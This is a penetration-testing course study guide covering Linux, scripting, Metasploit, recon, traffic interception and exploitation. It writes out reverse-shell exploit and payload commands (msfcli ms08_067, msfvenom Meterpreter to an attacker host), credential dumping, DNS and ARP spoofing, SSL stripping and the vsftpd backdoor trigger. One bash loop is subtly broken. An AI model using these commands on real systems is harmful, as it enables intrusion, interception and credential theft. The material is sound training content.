Study Guide: Linux

Study Guide
Advanced Penetration Testing
Created by: Julio A. Hawthorne, Teaching Assistant
Module 1: Linux
Lesson 1.1: Linux (Part 1)

Skills Learned From This Lesson: Intro

Skills Learned From This Lesson: CLI Basics, Linux Default Directories, User Creation,
Superuser Permissions
● > pwd - print working directory
● > ls - list directory contents
○ > ls -a - list directory contents including hidden files
○ > ls -l - list directory contents with details
● > cd - change directory
○ > cd .. - move to parent directory
○ > cd ../.. - move two parent directories back
● > man (manpage) - Format and display the manual pages for a linux CLI command
● Default linux directories -
○ > / - root directory
○ > /bin, /usr/bin - contains standard binaries for linux user commands
○ > /boot - contains linux kernel and bootloader
○ > /dev - contains devices (hard drives, RAM, etc)
○ > /etc - configuration files
○ > /home - default location for all users' home directories
○ > /lib, /usr/lib - hold library files for binaries contained in /bin, /sbin
○ > /lost+found - contains orphaned files
○ > /mnt - default mount point for file systems mounted post-boot

Brought to you by: Develop your team with the fastest growing catalog in the
cybersecurity industry. Enterprise-grade workforce development
management, advanced training features and detailed skill gap and

competency analytics.
1

○ > /opt - contains optional files and programs

○ > /proc - virtual directory, stores and allows modification of connected devices
○ > /root - home directory for the root superuser
○ > /sbin, /usr/sbin - contains standard binaries for linux system commands
○ > /tmp - temporary directory, all users have read+write permissions
○ > /usr - contains application files for users (stands for UNIX system resources)
○ > /var - contains files that are constantly changing (e.g. log files)
○ > /sys - virtual directory, symlink to kernel source tree
● Unlike most operating systems, Kali Linux only provides the root user account for use by
default.
● > rm - Remove files or directories
○ > rm -r - Remove directories recursively
○ > rm -rf - Force remove directory without confirmation
● > adduser - create new linux user, modify existing user accounts
○ > adduser [existing username] [group name] - add an existing user to a group
● > su - switch user
● By default, normal linux user account have limited privileges. the 'sudo' command allows
escalation of privileges to run commands as root.

Skills Learned From This Lesson: Managing files, moving through linux directories, text editor
basics
● Every object in linux is defined as a 'file'.
● > touch - create file
● > mkdir - create directory
● > mv [current file location] [desired file location] - move file (copy file to new location,
delete original)
● > cp [current file location] [desired file location] - copy file
● absolute path - full directory path to a file (e.g. /etc/apt/sources.list.d/docker.list).
● relative path - path to a file relative to the current working directory using shortcuts (e.g.
if currently in /home/user directory, to get to /usr/local/bin type "cd ../../usr/local/bin").
● > echo [string] - print the typed string to the standard output (to the terminal screen)
○ > echo [string] > filename - print the typed string into a file overwriting its current
contents


2

○ > echo [string] >> filename - append the typed string to the end of a file
● > cat - concatenate files and print to the standard output (terminal screen)
● > vi/vim - Bi-modal programming text editor(s)
○ > i - Switch to Insert Mode. Allows text entry
○ > ESC - Return to Command Mode.
○ > DD - Delete entire line (Command Mode)
○ > :wq! - Quit vim (from command mode), and save changes
○ > :q! - Quit vim (from command mode) without saving changes
● > nano - Simple text editor
○ > CTRL+W - Where is... (Search)
○ > CTRL+X - exit
● > gedit - GNOME desktop environment's default text editor
● > emacs - extensible text editor(s)

Skills Learned From This Lesson: File Permissions, Advanced Textfile Manipulation, Aptitude
Package Manager
● Unix Permissions - Read (r), Write (w), Execute (x)
● Broken down in octals - |rwx|rw-|r--
| | \Permissions for everyone else (Global)
| \Permissions for members of the Group
\Permissions for the file Owner
● Expressed in integers - |7|6|4|

0 - None | | \Permissions for everyone else (Global)
1 - Execute | \Permissions for members of the Group
2 - Write \Permissions for the file Owner
4 - Read
5 - Read & Execute
6 - Read & Write
7 - Read, Write & Execute
● > chmod - Change the access permissions of a file or directory
● > | (pipe) - Route the output from a command into another command


3

● > grep - Matches patterns from input text. Supports simple patterns and regular
expressions (regex)
● > cut - cut a field from a file or the standard input
○ > cut -d - The delimiter or boundary between fields
○ > cut -f - Tells cut which field to 'cut' up to
● > sort - Sort lines of text files
○ > sort -u - Sort lines of text files and remove duplicates
● > sed - edit text in a scriptable manner
● > awk - A versatile programming language for manipulating files
● > apt - The Aptitude package manager. Allows management of installed programs for
Debian/Ubuntu based Linux distributions.
○ > apt-get install [Package Name] > Install package
● > netstat - check for listening ports on the machine
● > apache2 - WebServer, installed by default on Kali Linux
● > service [service name] start|stop|restart|status - Manage the state of a linux service

Skills Learned From This Lesson: Creating cron jobs, Managing crontabs, check listening
network ports,
● crontab - operations that run on time-based intervals (minute, hour, day, week, month).
Can be used to establish persistence on a machine.
● > netcat - Utility for communication over networks
Teaching Assistant Extra Credit

● > tldr - Community-driven Linux command line program that gives a brief description of a
command and examples for its use. Available in some Linux distributions' package
managers and on github (https://github.com/tldr-pages/tldr).
Module 2: Programming
Lesson 2.1: Programming (Part 1) Fundamentals for Pen Testers



4

Lesson 2.2: Programming (Part2) Bash Scripting and If/Then Command

Skills Learned From This Lesson: ping, Bash Scripting, Environment Variable, If/Then
statements.
● ping - sends an ICMP ECHO_REQUEST to a host in a network. helps determine if a
host is alive.
● > echo $PATH - displays the places that linux looks for executables [Environment
Variable]
● > chmod 700 [filename] - makes the file executable for the file's owner
● > If/Then - Conditional statement in computer programming. 'If' this thing happens,
'Then' do this.
● > ping.sh
#!/bin/bash
# Putting the hash symbol at the beginning of a line signifies it as a comment. It is
not read by the interpreter but
# can be used to help people reading the code understand what the code is
doing.
# If the input after ./ping.sh is empty, run the following commands.

# "$1" is variable for [network]
if [ "$1" == "" ]
then
echo "Usage: ./ping.sh [network]"
echo "Example: ./ping.sh 192.168.1"
fi
Lesson 2.3: Programming (Part 3) Network Pings

Skills Learned From This Lesson: Else Statements, While Loop, Double-quotes in Bash
Scripting
● Else - Conditional Statement. If no defined condition is met in an 'If/Then' statement, do
'Else'.
● While/For Loop - Repeats a given operation While a condition exists/For each iteration in
a list.
● > seq - Sequence of integers
● Wrapping text in double-quotation "" tells the interpreter the text is a string.


5

● > ping.sh
#!/bin/bash
if [ "$1" == "" ]
then
echo "Usage: ./ping.sh [network]"
echo "Example: ./ping.sh 192.168.1"
else
for x in 'seq 1 254'; do
ping -c 1 $1.$x | grep "64 bytes" | cut -d " " -f 4 | sed 's/.$//'
done
fi
Lesson 2.4: Programming (Part 4) Python for Port Scanning

Skills Learned From This Lesson: Python 'socket', if/else Statements in Python, for Loops in
Python
● > which - prints location of a command binary to the terminal screen (e.g. which python)
● > module - In python, a predefined library of commands used to simplify python
programming
● > import - In python, tells the interpreter to use a specific module
● 'socket' module - In python, provides access to the BSD socket interface, available on all
modern Unix systems, Windows, MacOS and probably additional platforms.
● > raw_input - Receives input from the user for use in the python script.
● > socket.AF_INET - In python, specifies the address family the socket can communicate
with, in this case IPv4.
● > socket.SOCK_STREAM - In python, signifies the socket will communicate with TCP
sockets.
● > sock.connect - In python, connect the socket to a remote address. For IP sockets
specify (host, port)
● > sock.connect_ex - In python, works like 'sock.connect' but returns and error code
instead of raising an exception (and crashing the program) when an error occurs.
● In python, loops are denoted with indentation
● > python.py
#!/usr/bin/python
import socket


6

ip = raw_input("Enter the IP address: ")

port = input("Enter the port number: ")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if sock.connect_ex((ip,port)):
print "Port", port, "is closed"
else:
print "Port", port, "is open"
Lesson 2.5: Programming (Part 5) Basics of the C Language

Skills Learned From This Lesson: Functions, Basics of C, Compilers
● Function - a block of organized, reusable code that is used to perform a single, related
action.
● int main - Signifies to the compiler that execution begins at that point
● argc - contains the number of arguments passed to the program
● argv - a one dimensional array of strings/command line arguments
● Unlike python and bash (which are interpreted languages), C must be compiled using a
compiler (gcc for Linux, Xcode on MacOS and Microsoft Visual Studio on Windows
amongst others)
● > cprogram.c
#include <stdio.h>
int main(int argc, char *argv[])
{
if (argc < 2)
{
printf("%s\n", "Pass your name as an argument");
return -1;
}
else
{
printf("Hello %s\n", argv[1]);
return 0;
}
}


7

● 'gcc cprogram.c -o cprogram' to compile.

● To make programming easier, download, install and use an IDE (Integrated
Development Environment) when programming.
○ PyCharm - Python
○ VSCode - Javascript, HTML, CSS, Python, Go, etc.
○ Eclipse - Java
○ Atom - Developed by github
○ Sublime Text - Supports multiple languages
● http://docs.python.org/2/refrence/index.html#reference-index - Manual for the syntax and
core semantics of Python.
● https://docs.python.org/2/library/ - Manual for the Python Standard Library and Modules.
Module 3: Metasploit
Lesson 3.1: Metasploit (Part 1) Introduction

Lesson 3.2: Metasploit (Part 2) Fundamentals

Skills Learned From This Lesson: Metasploit Basics, Public Exploit Databases, Exploit
'Best-Practices'
● Metasploit Framework is written in ruby
● In Kali Linux, Metasploit's general resources & source code are located in
/usr/share/metasploit-framework
● Exploits - contains exploit source code separated by platform/attack vector
● ms08_067_netapi - A buffer overflow vulnerability triggered by a specially crafted RPC
(Remote Procedure Call) request.
● Be sure to properly vet any code/exploits downloaded from the internet prior to running
said code on your machine.
● IceWeasel - Fork of Firefox developed by the GNU Project
● Public databases for vulnerability and exploit research:
○ Exploit Database (http://www.exploit-db.com)
○ Packet Storm (https://packetstormsecurity.com)


8

○ SecurityFocus (https://www.securityfocus.com)
● Shellcode, which is typically unreadable, found in public exploits should be replaced with
trusted shellcode to mitigate the changes that unexpected malicious code will be
executed in your pentesting environment.
● It's best practice to test publicly obtained exploits against a test machine/VM prior to
running the code against a client machine.
Lesson 3.3: Metasploit (Part 2) Operation

Skills Learned From This Lesson: Starting Metasploit, Loading a Metasploit Module,
Understanding Module Options, Running an Exploit
● > msfupdate - Updates Metasploit to latest module tree.
● Metasploit uses Postgres as its database server. Run 'service postgresql start' and
'service metasploit start' or 'systemctl start postgresql.service' prior to starting Metasploit.
● > msfconsole - Starts the Metasploit Framework Console.
● > ipconfig - In Windows, displays information for connected networking devices.
● > ifconfig or ip addr - In Linux, displays information for connected networking devices.
● https://rapid7.com/db/?type=metasploit - Database of Metasploit Framework modules.
● Meterpreter - Metasploit-specific payload for Windows Exploitation.
● Inline Payload (Platform/PayloadType/PayloadName) - Puts the entire payload in the
attack string. Can be comparatively large in bytesize.
● Staged Payload (Platform/PayloadType_PayloadName) - Puts enough code in attack
string to callback and complete payload injection.
● Handler - In Metasploit, listens for a payload's return code on a network port to start a
session.
● msf > help - Displays a comprehensive list of the commands for msfconsole CLI
● msf > help [command] - Displays information pertaining to the supplied command
● msf > search [pattern] - Searches the local msf database for the supplied pattern
● msf > info [path/to/metasploit/module] - Gives information on the specified module and
its use
○ Name:
○ Module:
○ Platform:
○ Privileged: (Will exploit give us a session with elevated privileges)
○ License:


9

○ Rank:
○ Provided By: (Module Author)
○ Available targets
○ RHOST: Remote Host
○ RPORT: Remote Port
○ LHOST: Local Host
○ LPORT: Local Port
○ EXITFUNC: (Specifies how the process that will be attacked will exit)
○ Payload Information: (basic info for the payload to be injected)
○ Description:
● msf > use [path/to/metasploit/module] - Moves into the context of the module.
● msf module_type(name_of_module) > show options - Displays all of the adjustable
options available to the module.
● msf module_type(name_of_module) > show targets - Displays the available target
platforms.
● msf module_type(name_of_module) > show payloads - Displays all the available
payloads we can use for this module.
● msf module_type(name_of_module) > set [option] - Sets the value for the specified
option.
● msf module_type(name_of_module) > exploit/run - runs the module or exploit with
specified options.
● CTRL + Z - Backgrounds an active Metasploit session.
● msf > sessions -l - Lists active sessions.
● msf > sessions -i [session number] - switches context to the specified active session.
Lesson 3.4: Metasploit (Part 4) Auxiliary Module

Skills Learned From This Lesson: Auxiliary Modules, Module Options, SMB
● Auxiliary modules are primarily used for information gathering and vulnerability scanning.
● For SMB-based Windows auxiliary modules, the SMBDomain should be set to the
domain that the machine is a member of. If the machine isn't a part of a domain, this field
can be set to the name of the workgroup (typically WORKGROUP) the machine is a
member of.
● THREADS can be increased to increase scanning speeds if multiple hosts are being
scanned.



10

Lesson 3.5: Metasploit (Part 5) msfcli

Skills Learned From This Lesson: msfcli basics, msfcli command syntax, msfcli use cases
● msfcli can be run on the Linux command line to run a metasploit module from the
command line as a one-liner.
● msfcli is an excellent tool to integrate in a script to automate penetration testing
operations.
● > msfcli -h - Displays the msfcli help panel
● Command Syntax - msfcli <exploit_name> <option=value> [mode]
● Everytime msfcli is run it must reload the module tree. This could take time if your
machine/virtual machine is lower on resources but shouldn't be too bad if the machine is
newer and has enough resources (4 processing cores, 4-8 GB ram).
● > msfcli exploit/windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp
LHOST=[ip_address_of_attacker_machine]
LPORT=[port_listening_on_attacker_machine] RHOST=[ip_address_of_target_machine]
RPORT=[port_on_target_that_service_is_running_on]
Lesson 3.6: Metasploit (Part 6) msfvenom

Skills Learned From This Lesson: msfvenom payloads, msfconsole handlers, Meterpreter
Basics
● msfvenom is an encapsulation of msfpayload and msfencode. This tool allows an
attacker to create custom payloads, encode them and use them in the context of a
penetration test.
● > msfvenom -h - Displays the help panel.
● The syntax of msfvenom is very similar to that of msfcli, the main difference being
LPORT and LHOST being the network information on the attacker machine instead of
the target.
● > msfvenom -p windows/meterpreter/reverse_tcp
LHOST=[ip_address_of_attacker_machine]
LPORT=[port_listening_on_attacker_machine]
○ > -p <payload>
○ > -o <show options>
○ > -f <format>
○ > --help-formats <lists available formats for the specified payload>


11

● /var/www - Default location where Apache2 WebServer serves files.

● > service apache2 start/systemctl start apache2.service - Starts the Apache2 Web
Server
● A Meterpreter (msf > exploit/multi/handler) must be started and listening in msfconsole to
receive the staged payload sent to the target. The payload for this handler should be set
to the same payload we created in msfvenom (set payload
windows/meterpreter/reverse_tcp) as well as the LHOST
(ip_address_of_attacker_machine) and LPORT (port_listening_on_attacker_machine)
must also be set.
● Linux commands such as 'ifconfig' and 'ip addr' can be run directly from the command
line to get system information for use with msfconsole.
● meterpreter > help - Lists information on commands available in the meterpreter session.
● meterpreter > getuid - Displays user identification info for the user account that the
meterpreter session is running as.
● meterpreter > hashdump - Displays the password hashes for the user accounts on the
machine.

● 2 Common ways to vet code & exploits obtained from the internet (in addition to reading
the code) is analyzing the code in a debugger (Ghidra, WinDBG, OllyDBG, etc.) on an
isolated machine and/or running the code in a sandbox (Cuckoo Sandbox, Joe
Sandbox).
● http://github.com/enaqx/awesome-pentest - A collection of awesome penetration testing
resources, tools and other shiny things.
● https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf - Metasploit
Cheat Sheet by the SANS Institute.



12

Module 4: Information Gathering
Lesson 4.1: Information Gathering Intro (Part 1)

Lesson 4.2: Information Gathering (Part 2) Domain Name Services

Skills Learned From This Lesson: DNS Records, DNS Brute Forcing, DNS Zone Transfers
● OSINT (Open Source INTelligence) - The collection and analysis of information gathered
from public sources.
● > whois - Searches the public registrar database for information on a domain.
● > nslookup - Queries DNS to obtain the domain name, IP address or other DNS records
(CNAME, MX, A, AAAA, etc).
○ > set type=[record_type] - Specify the DNS record.
● > dig (domain information grouper) - Similar to nslookup but also offers an interactive
mode for DNS queries.
● > host - a simple tool for performing DNS lookups in linux.
○ > host -t ns [domain] - Obtain the nameservers associated with a domain.
○ > host -l [domain] [nameserver] - Attempt a DNS Zone Transfer using host
command.
● > fierce - A perl script used to bruteforce subdomains through DNS records.
Lesson 4.3: Information Gathering (Part 2) Targeting Email and Maltego

Skills Learned From This Lesson: theharvester, Maltego Fundamentals, Shodan Overview
● > theharvester - Automated tool that queries various sources to gather OSINT using
email as it's vector.
● netcraft.com - Website providing OSINT on companies, their domains and the
technologies that run their websites.
● Maltego - Graphical OSINT tool that provides a library of 'transforms' that visualize data
in a graph format for link analysis and data mining.
● Shodan.io - Scans the internet 24/7 pulling banners from the ports of hosts publicly
facing the internet
Lesson 4.4: Information Gathering (Part 4) recon-ng and Google Operators



13

Skills Learned From This Lesson: Google Operators, Google Hacking Database, recon-ng
● > recon-ng - a OSINT framework for information gathering that functions with modules
similar to the Metasploit Framework.
● Google Hacking Database (https://www.exploit-db.com/google-hacking-database) -
Public database of google hacking operators that can be used in google searches to find
specific information.
Lesson 4.5: Information Gathering (Part 4) NMAP and PortScanning

Skills Learned From This Lesson: NMap Port Scanning, Banner Grabbing, Nmap Output
● In addition to being available by default in Kali Linux, Nmap can be installed using the
package manager for most Linux distributions.
● Zervit - A simple and compact HTTP server.
● > nc -v [ipaddress] [port] - Use netcat to quickly pull a banner from a listening port.
● NMap - Powerful network port and vulnerability scanner. Manual can be found at
https://nmap.org/book/man.html
○ > nmap -sS (TCP SYN Scan) - Completes 2/3rds of the TCP handshake to check
for open ports.
○ > nmap -sT (TCP connect scan) - Completes full 3-way handshake to scan for
open ports.
○ > nmap -sU (UDP Scan) - Sends UDP packets to check for open ports.
○ > nmap ... -oA [name_of_output_files] - Output results of nmap in xml, nmap
format and grepable nmap format.
○ > nmap ... -p - Specify ports to scan, -p- will scan all 65535 ports.
● Orderly note keeping is essential during penetration testing.

● Tools like OWASP Amass (https://www.github.com/OWASP/Amass), Subfinder
(https://github.com/subfinder/subfinder) and MassDNS
(https://github.com/blechschmidt/massdns) are modern tools (as of 2019) can help
automate the process of finding subdomains using DNS records.
● OWASP Amass has a functionality that allows importing of its data into Maltego.



14

● The Shodan CLI tool (installable on any Unix-like operating system) is sometimes able to
query the shodan database for patterns that are restricted on the website. Worth looking
into.
Module 5: Vulnerability Discovery/Scanning
Lesson 5.1: Vulnerability Scanning Intro (Part 1)

Lesson 5.2: Vulnerability Scanning (Part 2) Nessus

Skills Learned From This Lesson: Vulnerability Scanning, Nessus Policies, Nessus Policy
Plugins
● Nessus - Automated vulnerability scanner. Offers free and paid professional version.
● > service nessusd start - Starts the Nessus Service (after installation)
● By default, the nessus Web Interface runs on port 8834 (localhost:8834,
127.0.0.1:8834).
○ Nessus Web Portal > Policies > New Policy - Adds new automated checks and
scans for Nessus to perform.
○ Nessus Web Portal > Policies > Select Existing Policy > Advanced Mode >
Plugins - Displays programs written in NASL that contain vulnerability
information, a simple set of remediation actions and the algorithm to test for the
presence of the security issue.
○ Nessus Web Portal > Scans > New Scan - Create and schedule a new
vulnerability scan for the specified hosts.
Lesson 5.3: Vulnerability Scanning (Part 3) Nmap Scripting Engine

Skills Learned From This Lesson: Nmap Scripting Engine Basics, NSE Vulnerability Scanning,
Service Enumeration
● It's a good idea to use the Nmap Scripting Engine (NSE) to verify results found using
automated vulnerability scanners.
● All NSE Scripts can be found in /usr/share/nmap/scripts in Kali Linux (and most other
Linux distributions).



15

● NSE Scripts are programmed in Lua and custom NSE scripts can be created using this
language.
● > nmap --script-help [search-pattern] - Display NSE script information related to the
submitted search pattern. e.g. nmap --script-help smb-check-vulns
○ nmap --script=nfs-ls - NSE script running the 'ls' command against an open NFS
port.
● Use NSE with caution on real pentests. Some scripts can cause a Denial-of-Service to
vulnerable systems. 'nmap -sC' or 'nmap --script safe' can be used to only run safe NSE
scripts.
● In cases where services like FTP allow anonymous access to files, it's worth assessing
the risk and impact of the service being in this state before considering it a high priority
vulnerability.
● The 'VRFY' verb being usable on port 25/tcp (smtp) can assist in enumerating mail users
during penetration tests.
Lesson 5.4: Vulnerability Scanning (Part 4) WebApp, XAMPP, WEBDAV, Nikto

Skills Learned From This Lesson: WebServer Vulnerability Scanning, Directory Brute-forcing,
Exploiting WebDAV
● XAMPP - An easy to install Web Stack consisting of Apache HTTP Server, MariaDB
database as well as PHP and Perl script interpreters.
● WebDAV - An extension of HTTP that allow clients to perform Web Content authoring
operations.
● > cadaver - Command line WebDAV client for Unix-based systems.
● Googling for default credentials on running services is a quick and easy way to attempt
to get access to a particular service.
● PHPMyAdmin - A free and open source admin tool for MySQL and MariaDB databases
written in PHP.
● When enumerating services for possible vulnerabilities, going through each server while
taking notes is recommended instead of diving head-first into the first potentially
vulnerable rabbit-hole.
● > dirbuster - A graphical tool for brute forcing directories on a web server.
● > nikto - An automated web server vulnerability scanner. Most effective against
commercial web applications.



16

Lesson 5.5: Vulnerability Scanning (Part 5) Directory Transversals

Skills Learned From This Lesson: Traversing directories, Web Server Exploitation, User
Enumeration
● Directory Traversal/Path Traversal - An HTTP attack that allow attackers access to
restricted directories and the ability to execute commands outside of the web server's
root directory.
● It may be worth trying different amounts of the '../' string when attempting to exploit
Directory Traversal. Depending on where the root directory of the web server is installed,
the default value listed in a CVE may differ.
● Unless a webserver is running as SYSTEM (Windows Superuser) or root (Unix-like
Superuser), you may not have full access to all files and directories on the machine.
● Connecting to a listening smtp server with the 'VRFY' verb enabled using Netcat (nc
[ip.address.of.machine] 25) may allow an attacker to query the smtp server for active
mail accounts.
○ > nc 192.168.1.76 25
○ > VRFY (username)

● While dirbuster is an excellent directory bruteforce tool, more modern tools (as of 2019)
exist that offer the same or greater functionality with less overhead. e.g. Gobuster
(https://github.com/OJ/gobuster), Dirsearch (https://github.com/maurosoria/dirsearch),
Konan (https://github.com/m4llok/konan) and WFuzz (https://github.com/xmendez/xfuzz)
to name a few.
● Tools like Burp Suite and OWASP ZAP can also assist in vulnerability scanning on web
servers with built in discovery/brute-forcing engines and web spiders.
● Other Web-based vulnerability scanners include WPScan (Wordpress Websites) and
Droopescan (Drupal CMS as well as other).
Module 6: Traffic Capture
Lesson 6.1: Traffic Capture Introduction (Part 1)




17

Lesson 6.2: Traffic Capture (Part 2) Analyzing Network Protocol with Wireshark
Skills Learned From This Lesson: Wireshark, Packet Captures, Wireshark Filters
● Wireshark - A free and open source packet analyzer. Shares the same functionality as
tcpdump with a graphical frontend.
● Monitoring packets transmitted using ftp can display data in unencrypted plain-text.
● Using the filter in Wireshark helps clear the log of noise and zero in on pertinent data in
transit.
Lesson 6.3: Traffic Capture (Part 3) Address Resolution Protocol (ARP)

Skills Learned From This Lesson: arpspoof, Man-in-the-Middle attacks, Linux IP-Forwarding
● ARP Spoofing - An attacker sends crafted ARP packers over a network, thereby
associating the IP address of a legitimate host with the MAC address of the attacker.
Lays the foundation for a network-based Man-in-the-Middle attack.
● > arpspoof - an ARP packet spoofing CLI tool.
● IP forwarding must be enabled to use arpspoof by changing the value of
/proc/sys/net/ipv4/ip_forward from 0 to 1.
● When using arpspoof, a session for each host on either end of the MITM attack must be
started to poison both ARP caches and cause traffic from either side to be routed
through the attacker machine.
● After the MITM attack is successful, Wireshark can be used to monitor the packet traffic
and inspect any unencrypted data in clear text.
Lesson 6.4: Traffic Capture (Part 4) DNS

Skills Learned From This Lesson: DNS, DNS Cache Poisoning, dnsspoof
● A Domain Name Server (DNS) is responsible for translating a domain name (gmail.com)
to an ip address (17.18.19.20) and telling a host which ip address to send it's traffic to
when using a domain name.
● > dnsspoof - a command line tool used to poison the DNS Cache and route traffic
intended for the legitimate ip address attached to a domain name to an attacker
machine.
○ > dnsspoof -i [interface] -f /root/hosts.txt
● ARP spoofing must be used between the gateway and the target to cause DNS queries
to be forwarded to the attacker machine instead of the legitimate DNS.



18

Lesson 6.5: Traffic Capture (Part 5) Ettercap

Skills Learned From This Lesson: ettercap, SSL/TLS encryption, SSL/TLS certificates
● Encrypted traffic, such as SSL/TLS traffic over HTTP/HTTPS cannot be monitored using
methods like arp spoofing and traffic analysis alone. Some technique must be used to
invade the secure connection between the target host and the destination server.
● A certificate error could be a sign that secure network traffic to the server has been
undermined by a MITM attack.
● > ettercap - An open source network security tool for man-in-the-middle attacks on a
LAN.
Lesson 6.6: Traffic Capture (Part 6) SSL Stripping

Skills Learned From This Lesson: SSL Stripping, iptables, Routing Rules
● SSL Stripping is the practice of downgrading SSL/TLS encrypted HTTPS traffic down to
HTTP traffic and forwarding the MITM'd traffic via HTTPS to the destination server. This
technique circumvents the certificate error that appears in SSL MITM with ettercap alone
and still allows cleartext inspection of the target's traffic.
● Modern browsers will note that the traffic being sent is 'not secure' in the address bar
and by removing the lock icon to the right of the URL.
● > iptables - Linux user-space utility allowing the configuration of the Linux kernel firewall
○ > iptables -t natPREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
8080 - iptables command to forward traffic from port 80 to port 8080 for SSL Strip
-

● A recently developed framework for ARP cache poisoning and MITM attckes can be
found in Bettercap (https://github.com/bettercap/bettercap). This framework can also be
used to carry out Wifi attacks and has a slick Web UI for beginners.
● dsniff (https://www.monkey.org/~dugsong/dsniff) is an excellent tool to monitor network
traffic for interesting data during a MITM attack.
● Browser extensions like HTTPS Everywhere will force the HTTPS connection to a site
and will redirect to a warning page and notify the user that they are going to a site using
insecure transport methods.
● Evilginx (a MITM Web Server based on Nginx) is a modern MITM tool that can use
'phishlets' to act as a doppelganger to a legitimate site, complete with SSL/TLS



19

encryption, and forward all traffic to the legitimate host all while harvesting the targets
credentials, session cookies and 2-Factor Authentication Tokens.
ttps://github.com/kgretzky/evilginx2)
(h
Module 7: Exploitation
Lesson 7.1: Exploitation (Part 1) Direct Exploitation

Skills Learned From This Lesson: Webshells, WebDAV Uploads, msfvenom/Meterpreter
● > In Web Application Exploitation, it's common to take advantage of the
programming/scripting language found on the site during exploitation. Here are some
examples:
○ > PHP (LAMP, LEMP, Wordpress, etc)
○ > Javascript (NodeJS, etc.)
○ > Python (Flask, Django)
○ > Perl (WAMPP, XAMPP)
○ > Ruby (Ruby on Rails)
○ > Go (Buffalo)
○ > Java (JBoss, Apache Tomcat)
○ > ASP.NET (Windows IIS)
● Default webshells coded in various web programming languages included in Kali Linux
can be found in /usr/share/webshells/
● If WebDAV is enabled on a Web Application, Cadaver can be used to upload a webshell
coded in the appropriate programming language to gain an initial foothold.
● Msfvenom can be utilized to create a staged reverse shell payload, Cadaver to upload
the created payload and Meterpreter (in msfconsole) to handle the reverse shell
returning from the target.
● Mimikatz - An open-source utility that enables the capture of credentials and Kerberos
tickets from the Windows Local Security Authority Subsystem Service (IASSS) on a
windows machine.
● msf exploit (handler) > show advanced - Displays advanced settings to tune the handling
of the reverse shell received from the target



20

○ > ExitOnSession - Advanced option, can be set to FALSE to allow multiple

sessions from a mass distributed payload to return to the handler instead of it
exiting after the return of a single shell. Requires running as a job upon running
(exploit -j)
○ > sessions -l - List active sessions.
○ > sessions -i [session#] - Interact with the specified session.
● meterpreter > sysinfo - Displays basic information of the exploited Windows machine.
● meterpreter > getuid - Displays the current user and permissions for the exploited
process that meterpreter is in control of.
Lesson 7.2: Exploitation (Part 2) SQL commands

Skills Learned From This Lesson: Database Exploitation, SQL Commands, Trivial File Transfer
Protocol
● SQL (Structured Query Language) - Programming language used to create and manage
databases.
● Most Common Web Databases - MySQL/MariaDB, Oracle, MSSQL, MongoDB
(NoSQL), PostgreSQL
● Some Admin Web Applications (such as phpMyAdmin) that allows the ability to run SQL
queries on the Database may allow the database server to run PHP webshells on the
host.
● With SQL Injection, it's also possible to dump the credentials for the user accounts held
in the database to possibly login with escalated privileges.
● In Windows, with TFTP (Trivial File Transfer Protocol) it's possible to transfer files onto
the target machine. In cases where TFTP isn't activated, Powershell can be used to
accomplish the same.
● atftpd - Linux tftp service that can be used to serve files from a specified directory.
Lesson 7.3: Exploitation (Part 3) Directory Traversal

Skills Learned From This Lesson: Directory Traversal, Post-exploitation Recon, Security
Account Manager Forensics
● What data can be accessed in Directory Traversal exploits are entirely dependent on the
permissions that the exploited service is running as and the nuances of the operating
system you are exploiting.
● Security Account Manager - Database in Windows that stores user's passwords.



21

● In Windows XP, there is a backup of the SAM file in '\WINDOWS\repair\sam' that can be
accessed when the SAM itself cannot be touched. A SYSKEY from the system hive must
be used to access the backed up data.
● Enumeration of active services can be useful when looking for interesting files and
directories during Directory Traversal exploitation. e.g. looking into ftp shares via
directory traversal exploitation.
● The existence of active default user accounts can be discovered during directory
traversal exploitation and recon.
● Exploits like directory traversal are ideal when exploiting services that may crash under
even a light load. Since these exploits take advantage of the normal functionality of the
service, these have a far less intrusive impact than a kernel exploit, buffer overflow,
memory corruption or the like.
Lesson 7.4: Exploitation (Part 4) Open Source Vulnerability

Skills Learned From This Lesson: OSVDB, Webserver Security, Common Misconfigurations
● Open Source Vulnerability Database - An open source software vulnerability database
whose goal was to provide accurate, detailed, current, and unbiased technical
information on security vulnerabilities. The database is shutdown as of 2016, though the
blog continues in existence.
● Best practices when deploying web servers is to run the web server as an unprivileged
user, normally www-data.
● msf > info path/to/exploit - Gives info on an exploit and displays links to references and
POCs that explain the exploit and/or how to use the module properly.
Lesson 7.5: Exploitation (Part 5) Using Backdoor to Access an FTP Server

Skills Learned From This Lesson: VSFTPD Backdoor, Remote Access Software, Non-Standard
Ports Scanning
● VSFTPD 2.3.4 - In the past was subject to a backdoor that was uploaded to the
application's repository and distributed to servers that installed the application for a short
amount of time. This is exploited by submitting ':)' in the username. This spawns a root
shell on port 6200.
● During pentests, it's a good idea to look out for nonstandard ports that may have a
remote administration tool or other vulnerable remote access software running that a
sysadmin could have left running.



22

Lesson 7.6: Exploitation (Part 6) Attaching to an IP Address

Skills Learned From This Lesson: NFS Shares, SSH, Private Keys
● > showmount - show mount information for an NFS server.
